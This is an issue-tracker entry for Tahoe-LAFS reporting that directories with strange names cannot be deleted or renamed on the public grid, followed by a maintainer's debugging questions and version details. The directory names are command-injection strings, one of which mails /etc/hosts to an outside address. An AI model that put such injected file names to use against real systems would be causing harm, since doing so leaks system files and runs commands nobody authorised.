Cannot Delete Or Rename Files/Directories With Wacky Names #1141
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Reference: tahoe-lafs/trac-2024-07-25#1141
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Delete Branch "%!s(<nil>)"
Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?
In the pubgrid, I created some badly-named directories.
http://pubgrid.tahoe-lafs.org/uri/URI%3ADIR2%3Actmtx2awdo4xt77x5xxaz6nyxm%3An5t546ddvd6xlv4v6se6sjympbdbvo7orwizuzl42urm73sxazqa/
For examples: "blamp $(curl noncombatant.org)" and "zumby-bumby ; mail blaggy@mailinator.com < /etc/hosts".
I cannot rename or delete these directories. I get error messages like:
"The page you are looking for is temporarily unavailable.
Please try again later." (after a very long wait)
and
"No such child: zumby-bumby ; mail blaggy@mailinator.com < /etc/hosts"
hm, can we distinguish these failures from general problems with the pubgrid? Specifically, can you delete normally-named directories at about the same time as you're unable to delete these weird ones? I wouldn't expect weird-named directories to fail in that way.. I expect errors more like 404 or "no such file or directory".
The
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file finally started to irritate me because I have to scroll down past it. (It must have taken noncombatant quite a while to type that in!). So I scrolled over to the right and clicked the "del" button next to it. After a while, the gateway returned this page:Oh, and I was using http://pubgrid.tahoe-lafs.org/, which declares its version number to be:
allmydata-tahoe: 1.6.1, foolscap: 0.4.2, pycryptopp: 0.5.17, zfec: 1.4.5, Twisted: 8.2.0, Nevow: 0.9.31, zope.interface: 3.3.1, python: 2.5.2, platform: Linux-debian_5.0.4-i686-32bit, sqlite: 3.5.9, simplejson: 1.9.2, argparse: 0.9.1, pyOpenSSL: 0.7, pyutil: 1.3.34, zbase32: 1.1.1, setuptools: 0.6c12dev, pysqlite: 2.3.2
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